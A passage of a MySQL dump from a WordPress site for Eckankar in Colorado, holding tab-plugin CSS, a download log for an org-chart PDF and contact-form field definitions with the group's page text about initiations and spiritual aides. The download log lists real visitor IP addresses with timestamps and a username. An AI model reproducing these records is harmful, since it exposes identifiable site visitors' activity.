.wonderplugintabs-header-li-active {\\n\\tbackground-color: @tab-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-active-last {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-first {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-first-side-arrows {\\n\\tmargin-left: @tab-margin;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-last {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-last-side-arrows {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-prev {\\n\\tdisplay: none;\\n\\ttext-align: center;\\n\\tposition: absolute;\\n\\ttop: 0;\\n\\tleft: 0;\\n\\tcursor: pointer;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-prev:before {\\n\\tposition: relative;\\n  \\ttop: 50%;\\n  \\tmargin-top: -9px;\\n  \\tfont-family: FontAwesome;\\n  \\tdisplay: block;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-prev:hover {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-next {\\n\\tdisplay: none;\\n\\ttext-align: center;\\n\\tposition: absolute;\\n\\ttop: 0;\\n\\tright: 0;\\n\\tcursor: pointer;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-next:before {\\n\\tposition: relative;\\n\\ttop: 50%;\\n\\tmargin-top: -9px;\\n\\tfont-family: FontAwesome;\\n\\tdisplay: block;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-next:hover {\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu {\\n\\tbox-sizing: border-box;\\n\\tdisplay: none;\\n\\ttext-align: center;\\n\\tposition: absolute;\\n\\ttop: 0;\\n\\tright: 0;\\n\\tcursor: pointer;\\n\\tbackground-color: @tab-color;\\n\\tborder-top-left-radius: @tab-radius;\\n\\tborder-top-right-radius: @tab-radius;\\n\\tpadding: 8px 12px;\\n\\tcolor: @title-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-caption {\\n\\tdisplay: table-cell;\\n\\tvertical-align: middle;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-text {\\n\\tfont-family: \\\"Open Sans\\\", Arial, sans-serif;\\n\\tfont-size: 12px;\\n\\tfont-weight: 400;\\n\\tvertical-align: middle;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-icon {\\n\\tfont-family: FontAwesome;\\n\\tfont-size: 14px;\\n\\tvertical-align: middle;\\n\\tmargin: 8px;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu:hover {\\n\\tbackground-color: @tab-hover-color;\\t\\n\\tcolor: @title-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-dropdown {\\n\\tdisplay: none;\\n\\tposition: absolute;\\n\\twhite-space: nowrap;\\n\\ttop: 100%;\\n\\tright: 0;\\t\\n\\tbox-shadow: 0 6px 12px rgba(0,0,0,.175);\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-dropdown-item {\\n\\tpadding: 12px 32px 12px 20px;\\t\\n\\tcursor: pointer;\\n\\ttext-align: left;\\n\\tbackground-color: @tab-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-dropdown-item:hover {\\n\\tbackground-color: @tab-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-icon-fontawesome {\\n\\tfont-family: FontAwesome;\\n\\tline-height: @icon-size;\\n\\tfont-size: @icon-size;\\n\\tvertical-align: middle;\\n\\tmargin: 8px;\\n\\tcolor: @icon-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-icon-image {\\n\\tmargin: 4px;\\n\\tvertical-align: middle;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-title {\\n\\tdisplay: inline-block;\\n\\tmargin: 4px;\\n\\tfont-family: \\\"Open Sans\\\", Arial, sans-serif;\\n\\tfont-size: 12px;\\n\\tfont-weight: 400;\\n\\tvertical-align: middle;\\n\\tcolor: @title-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li:hover .wonderplugintabs-header-title, \\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-active .wonderplugintabs-header-title, \\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-dropdown-item:hover .wonderplugintabs-header-title {\\n\\tcolor: @title-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li:hover .wonderplugintabs-header-icon-fontawesome, \\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-active .wonderplugintabs-header-icon-fontawesome,\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-menu-dropdown-item:hover .wonderplugintabs-header-icon-fontawesome {\\n\\tcolor: @icon-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth {\\n\\tdisplay: block;\\n\\tmargin: 0;\\n\\tborder-bottom: none;\\n\\ttext-align: left;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth:last-child {\\n\\tborder-bottom: 1px solid #ccc;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-panel-wrap {\\n\\tbox-sizing: border-box;\\n\\tposition: relative;\\n\\tdisplay: block;\\n\\twidth: 100%;\\n\\toverflow: hidden;\\n\\tborder: 2px solid @tab-hover-color;\\n\\tbackground-color: #fff;\\t\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-panel-wrap &gt; .wonderplugintabs-panel {\\n\\tbox-sizing: border-box;\\n\\tdisplay: block;\\n\\tvisibility: hidden;\\n\\tposition: absolute;\\n\\ttop: 0;\\n\\tleft: 0;\\n\\twidth: 100%;\\n\\ttext-align: @panel-text-align;\\n\\tpadding: @panel-padding;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-panel-wrap &gt; .wonderplugintabs-panel-active {\\n\\tposition: relative;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-ul-fullwidth {\\n\\twhite-space: normal;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth {\\n\\tpadding: 8px;\\n\\tborder-radius: 0;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap  .wonderplugintabs-panel {\\n\\tpadding: @panel-padding;\\n\\tbackground-color: #fff;\\t\\n\\tcolor: #444;\\n\\tmargin-top: 8px;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap  .wonderplugintabs-panel-active {\\n\\tposition: relative;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth .wonderplugintabs-header-caption:after {\\n\\tposition:absolute;\\n\\tcolor:@title-color;\\n\\ttop: 12px;\\n\\tright:8px;\\n\\tcontent: \\\"\\\\f107\\\";\\n\\tfont-family: FontAwesome;\\n\\tfont-size: 16px;\\n\\tfont-weight:400;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth.wonderplugintabs-header-li:hover .wonderplugintabs-header-caption:after {\\n\\tcolor:@title-hover-color;\\n}\\n\\n#wonderplugintabs-TABSID &gt; .wonderplugintabs-header-wrap .wonderplugintabs-header-li-fullwidth.wonderplugintabs-header-li-active .wonderplugintabs-header-caption:after {\\n\\tcontent: \\\"\\\\f106\\\";\\n\\tcolor:@title-hover-color;\\n}\"}','2019-07-14 15:53:41','1');
/*!40000 ALTER TABLE `wpcl_wonderplugin_tabs` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wonderplugin_tabs` with 1 row(s)
--

--
-- Table structure for table `wpcl_sdm_downloads`
--

DROP TABLE IF EXISTS `wpcl_sdm_downloads`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_sdm_downloads` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `post_id` mediumint(9) NOT NULL,
  `post_title` mediumtext NOT NULL,
  `file_url` mediumtext NOT NULL,
  `visitor_ip` mediumtext NOT NULL,
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `visitor_country` mediumtext NOT NULL,
  `visitor_name` mediumtext NOT NULL,
  `user_agent` mediumtext NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_sdm_downloads`
--

LOCK TABLES `wpcl_sdm_downloads` WRITE;
/*!40000 ALTER TABLE `wpcl_sdm_downloads` DISABLE KEYS */;
INSERT INTO `wpcl_sdm_downloads` VALUES (1,213454,'Protected: Colorado ECK Org Chart-SDM','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2019-12-16 12:17:26','United States','S8zhaBda',''),(2,213454,'Protected: Colorado ECK Org Chart-SDM','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2019-12-16 12:18:51','United States','S8zhaBda',''),(3,213454,'Protected: Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2019-12-16 12:36:44','United States','S8zhaBda',''),(4,213454,'Protected: Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2019-12-16 12:38:14','United States','S8zhaBda',''),(5,213454,'Protected: Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2019-12-16 14:19:49','United States','S8zhaBda',''),(6,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','172.112.32.82','2020-02-22 06:11:18','United States','Not Logged In',''),(7,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2020-03-22 15:01:23','United States','Not Logged In',''),(8,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.245.64.80','2020-03-22 16:00:15','United States','Not Logged In',''),(9,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','98.142.187.202','2020-03-29 20:41:54','United States','Not Logged In',''),(10,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','66.115.168.23','2020-03-29 23:07:38','United States','Not Logged In',''),(11,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','95.175.104.28','2020-03-30 01:18:19','Finland','Not Logged In',''),(12,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','73.169.72.251','2020-03-30 09:19:27','United States','Not Logged In',''),(13,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','73.169.72.251','2020-03-30 09:19:31','United States','Not Logged In',''),(14,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','71.229.136.230','2020-03-30 09:22:07','United States','Not Logged In',''),(15,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','73.229.221.144','2020-03-30 20:34:07','United States','Not Logged In',''),(16,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','73.229.221.144','2020-03-30 20:35:56','United States','Not Logged In',''),(17,213454,'Colorado ECK Org Chart','https://eckankar-colorado.org/wp-content/uploads/2019/07/ETC-Org-Chart-3-15-2019.pdf','73.229.221.144','2020-03-30 20:35:57','United States','Not Logged In','');
/*!40000 ALTER TABLE `wpcl_sdm_downloads` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_sdm_downloads` with 17 row(s)
--

--
-- Table structure for table `wpcl_nf3_fields`
--

DROP TABLE IF EXISTS `wpcl_nf3_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `type` longtext DEFAULT NULL,
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `field_label` longtext DEFAULT NULL,
  `field_key` longtext DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `required` bit(1) DEFAULT NULL,
  `default_value` longtext DEFAULT NULL,
  `label_pos` varchar(15) DEFAULT NULL,
  `personally_identifiable` bit(1) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=685 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_fields`
--

LOCK TABLES `wpcl_nf3_fields` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_fields` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_fields` VALUES (1,'Name','name','textbox',1,'2019-07-15 20:38:56','2019-07-15 13:38:56',NULL,NULL,NULL,0x00,NULL,NULL,0x00),(2,'Email','email','email',1,'2019-07-15 20:38:56','2019-07-15 13:38:56',NULL,NULL,NULL,0x00,NULL,NULL,0x00),(3,'Message','message','textarea',1,'2019-07-15 20:38:56','2019-07-15 13:38:56',NULL,NULL,NULL,0x00,NULL,NULL,0x00),(4,'Submit','submit','submit',1,'2019-07-15 20:38:56','2019-07-15 13:38:56',NULL,NULL,NULL,0x00,NULL,NULL,0x00),(5,'Text','html_141','html',2,'2022-09-21 21:56:36',NULL,'Text','html_141',1,0x00,'<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(6,'First Name','textbox_142','textbox',2,'2022-09-21 21:56:36',NULL,'First Name','textbox_142',2,0x01,'','above',0x00),(7,'Last Name','lastname_143','lastname',2,'2022-09-21 21:56:36',NULL,'Last Name','lastname_143',3,0x01,'','above',0x01),(8,'Email','email_144','email',2,'2022-09-21 21:56:36',NULL,'Email','email_144',4,0x01,'','above',0x01),(9,'Phone','phone_145','phone',2,'2022-09-21 21:56:36',NULL,'Phone','phone_145',5,0x01,'','above',0x01),(10,'Your Local Area','listselect_146','listselect',2,'2022-09-21 21:56:36',NULL,'Your Local Area','listselect_146',6,0x01,'','above',0x00),(13,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166666321','listselect',2,'2022-09-21 21:56:36',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166666321',7,0x01,'','above',0x00),(14,'Enter Your Message Here','textarea_150','textarea',2,'2022-09-21 21:56:36',NULL,'Enter Your Message Here','textarea_150',8,0x01,'','above',0x00),(16,'Submit','submit_152','submit',2,'2022-09-21 21:56:36',NULL,'Submit','submit_152',10,0x00,'','',0x00),(29,'Text','html_201','html',4,'2022-09-20 16:50:27',NULL,'Text','html_201',1,0x00,'<p><font color=\"#23507d\"><span style=\"font-size: 28px;\"><b>Members</b></span></font></p>\n<p><span style=\"color: rgb(51, 51, 51);font-size: 22px;\">Add/Update Email or Mailing Address</span></p>\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size:20px;\"><br>Your Information Is Safe</span></strong></p>\n<p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>','',0x00),(30,'First Name','textbox_202','textbox',4,'2022-09-20 16:50:27',NULL,'First Name','textbox_202',2,0x01,'','above',0x00),(31,'Last Name','lastname_203','lastname',4,'2022-09-20 16:50:27',NULL,'Last Name','lastname_203',3,0x01,'','above',0x01),(32,'Phone','phone_205','phone',4,'2022-09-20 16:50:27',NULL,'Phone','phone_205',4,0x00,'','above',0x01),(33,'Email    (please fill in if adding or updating email)','email_204','email',4,'2022-09-20 16:50:27',NULL,'Email    (please fill in if adding or updating email)','email_204',5,0x00,'','above',0x01),(34,'Street Address (add or update mailing address)','street_address_add_or_update_mailing_address_1616603898544','address',4,'2022-09-20 16:50:27',NULL,'Street Address (add or update mailing address)','street_address_add_or_update_mailing_address_1616603898544',6,0x00,'','above',0x01),(35,'City','city_216','city',4,'2022-09-20 16:50:27',NULL,'City','city_216',7,0x00,'','above',0x00),(36,'State','listselect_218','listselect',4,'2022-09-20 16:50:27',NULL,'State','listselect_218',8,0x00,'','above',0x00),(37,'Country','listcountry_219','listcountry',4,'2022-09-20 16:50:27',NULL,'Country','listcountry_219',9,0x00,'US','above',0x00),(38,'hr','hr_207','hr',4,'2022-09-20 16:50:27',NULL,'hr','hr_207',10,0x00,'','',0x00),(39,'If You Have Comments To Add - Please Enter Them Here','textarea_210','textarea',4,'2022-09-20 16:50:27',NULL,'If You Have Comments To Add - Please Enter Them Here','textarea_210',11,0x00,'','above',0x00),(41,'Submit','submit_212','submit',4,'2022-09-20 16:50:27',NULL,'Submit','submit_212',13,0x00,'','',0x00),(42,'Text','html_80','html',5,'2021-02-12 21:31:59',NULL,'Text','html_80',1,0x00,'<p><p></p>\n<h3><span style=\"color: #23507d;\"><strong>Alamosa Initiators and ESA\'s</strong></span></h3>\n\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(43,'First Name','textbox_81','textbox',5,'2021-02-12 21:31:59',NULL,'First Name','textbox_81',2,0x01,'','above',0x00),(44,'Last Name','lastname_82','lastname',5,'2021-02-12 21:31:59',NULL,'Last Name','lastname_82',3,0x01,'','above',0x01),(45,'Email','email_83','email',5,'2021-02-12 21:31:59',NULL,'Email','email_83',4,0x01,'','above',0x01),(46,'Phone','phone_84','phone',5,'2021-02-12 21:31:59',NULL,'Phone','phone_84',5,0x01,'','above',0x01),(47,'Your Local Area','listselect_85','listselect',5,'2021-02-12 21:31:59',NULL,'Your Local Area','listselect_85',6,0x01,'','above',0x00),(50,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166999137','listselect',5,'2022-09-20 16:50:50',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613166999137',7,0x01,'','above',0x00),(51,'Enter Your Message Here','textarea_89','textarea',5,'2022-09-20 16:50:50',NULL,'Enter Your Message Here','textarea_89',8,0x01,'','above',0x00),(53,'Submit','submit_91','submit',5,'2022-09-20 16:50:50',NULL,'Submit','submit_91',10,0x00,'','',0x00),(54,'Text','html_93','html',6,'2022-09-21 22:00:27',NULL,'Text','html_93',1,0x00,'<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','',0x00),(55,'First Name','textbox_94','textbox',6,'2022-09-21 22:00:27',NULL,'First Name','textbox_94',2,0x01,'','above',0x00),(56,'Last Name','lastname_95','lastname',6,'2022-09-21 22:00:27',NULL,'Last Name','lastname_95',3,0x01,'','above',0x01),(57,'Email','email_96','email',6,'2022-09-21 22:00:27',NULL,'Email','email_96',4,0x01,'','above',0x01),(58,'Phone','phone_97','phone',6,'2022-09-21 22:00:27',NULL,'Phone','phone_97',5,0x01,'','above',0x01),(59,'Your Local Area','listselect_98','listselect',6,'2022-09-21 22:00:27',NULL,'Your Local Area','listselect_98',6,0x01,'','above',0x00),(62,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613167025126','listselect',6,'2022-09-21 22:00:27',NULL,'Select The Person You Would Like To Contact','select_the_person_you_would_like_to_contact_1613167025126',7,0x01,'','above',0x00),(63,'Enter Your Message Here','textarea_102','textarea',6,'2022-09-21 22:00:27',NULL,'Enter Your Message Here','textarea_102',8,0x01,'','above',0x00),(65,'Submit','submit_104','submit',6,'2022-09-21 22:00:27',NULL,'Submit','submit_104',10,0x00,'','',0x00),(66,'Text','html_20','html',8,'2022-09-21 22:02:40',NULL,'Text','html_20',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n','',0x00),(67,'First Name','textbox_21','textbox',8,'2022-09-21 22:02:40',NULL,'First Name','textbox_21',2,0x01,'','above',0x00),(68,'Last Name','lastname_22','lastname',8,'2022-09-21 22:02:40',NULL,'Last Name','lastname_22',3,0x01,'','above',0x01),(69,'Email','email_23','email',8,'2022-09-21 22:02:40',NULL,'Email','email_23',4,0x01,'','above',0x01),(70,'Phone','phone_24','phone',8,'2022-09-21 22:02:40',NULL,'Phone','phone_24',5,0x01,'','above',0x01),(71,'Your Local Area','listselect_25','listselect',8,'2022-09-21 22:02:40',NULL,'Your Local Area','listselect_25',6,0x01,'','above',0x00),(72,'hr','hr_26','hr',8,'2022-09-21 22:02:40',NULL,'hr','hr_26',7,0x00,'','',0x00),(73,'Colorado Leadership Positions','html_27','html',8,'2022-09-21 22:02:40',NULL,'Colorado Leadership Positions','html_27',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>','',0x00),(74,'Select the person you would like to email','listselect_28','listselect',8,'2022-09-21 22:02:40',NULL,'Select the person you would like to email','listselect_28',9,0x01,'','above',0x00),(75,'Enter Your Message Here','textarea_29','textarea',8,'2022-09-21 22:02:40',NULL,'Enter Your Message Here','textarea_29',10,0x01,'','above',0x00),(77,'Submit','submit_31','submit',8,'2022-09-21 22:02:40',NULL,'Submit','submit_31',12,0x00,'','',0x00),(78,'Text','html_238','html',9,'2022-09-21 22:03:18',NULL,'Text','html_238',1,0x00,'<p></p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Tell Us Your Ideas!</span></span></span></strong></span></h3>\n<span style=\"font-size: 12pt;\"><span style=\"color: #23507d;\"><strong>Do you have an idea to help further the efforts of ECKANKAR in Colorado?</strong></span></span>\n\n<p></p><p>Your ideas are of great value. This process exists for the sole purpose of bringing projects to the fore and putting them into action. If your idea is fully formed but you are unsure about how and where to implement it, we still wish to hear the idea and will do all we can to help you bring it to fruition. Just tell us some details and we will forward your proposal to the right people.</p>','',0x00),(79,'First Name','textbox_239','textbox',9,'2022-09-21 22:03:18',NULL,'First Name','textbox_239',2,0x01,'','above',0x00),(80,'Last Name','lastname_240','lastname',9,'2022-09-21 22:03:18',NULL,'Last Name','lastname_240',3,0x01,'','above',0x01),(81,'Email','email_241','email',9,'2022-09-21 22:03:18',NULL,'Email','email_241',4,0x01,'','above',0x01),(82,'Phone','phone_242','phone',9,'2022-09-21 22:03:18',NULL,'Phone','phone_242',5,0x01,'','above',0x01),(83,'Your Local Area','listselect_243','listselect',9,'2022-09-21 22:03:18',NULL,'Your Local Area','listselect_243',6,0x01,'','above',0x00),(84,'hr','hr_244','hr',9,'2022-09-21 22:03:18',NULL,'hr','hr_244',7,0x00,'','',0x00),(85,'What Is Your Idea?','html_245','html',9,'2022-09-21 22:03:18',NULL,'What Is Your Idea?','html_245',8,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n','',0x00),(86,' Give Your Idea A Title','textbox_256','textbox',9,'2022-09-21 22:03:18',NULL,' Give Your Idea A Title','textbox_256',9,0x01,'','above',0x00),(87,'Enter The Details of Your Idea','textarea_253','textarea',9,'2022-09-21 22:03:18',NULL,'Enter The Details of Your Idea','textarea_253',10,0x01,'','above',0x00),(88,'Why Should It Be Done (what is the spiritual purpose?)','textbox_257','textbox',9,'2022-09-21 22:03:18',NULL,'Why Should It Be Done (what is the spiritual purpose?)','textbox_257',11,0x01,'','above',0x00),(89,'Who Will Do It (you or someone else?)','textbox_258','textbox',9,'2022-09-21 22:03:18',NULL,'Who Will Do It (you or someone else?)','textbox_258',12,0x01,'','above',0x00),(90,'How Many People Will Be Required To Make This Happen?','textbox_259','textbox',9,'2022-09-21 22:03:18',NULL,'How Many People Will Be Required To Make This Happen?','textbox_259',13,0x01,'','above',0x00),(91,'When Would This Happen?','textbox_263','textbox',9,'2022-09-21 22:03:18',NULL,'When Would This Happen?','textbox_263',14,0x01,'','above',0x00),(92,'Where Would This Happen?','textbox_264','textbox',9,'2022-09-21 22:03:18',NULL,'Where Would This Happen?','textbox_264',15,0x01,'','above',0x00),(93,'What Is The Anticipated Cost To Implement This Idea?','textbox_265','textbox',9,'2022-09-21 22:03:18',NULL,'What Is The Anticipated Cost To Implement This Idea?','textbox_265',16,0x01,'','above',0x00),(95,'Submit','submit_255','submit',9,'2022-09-21 22:03:18',NULL,'Submit','submit_255',18,0x00,'','',0x00),(96,'Text','html_18','html',10,'2022-09-21 22:03:37',NULL,'Text','html_18',1,0x00,'<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>','',0x00),(97,'First Name','textbox_6','textbox',10,'2022-09-21 22:03:37',NULL,'First Name','textbox_6',2,0x01,'','above',0x00),(98,'Last Name','lastname_8','lastname',10,'2022-09-21 22:03:37',NULL,'Last 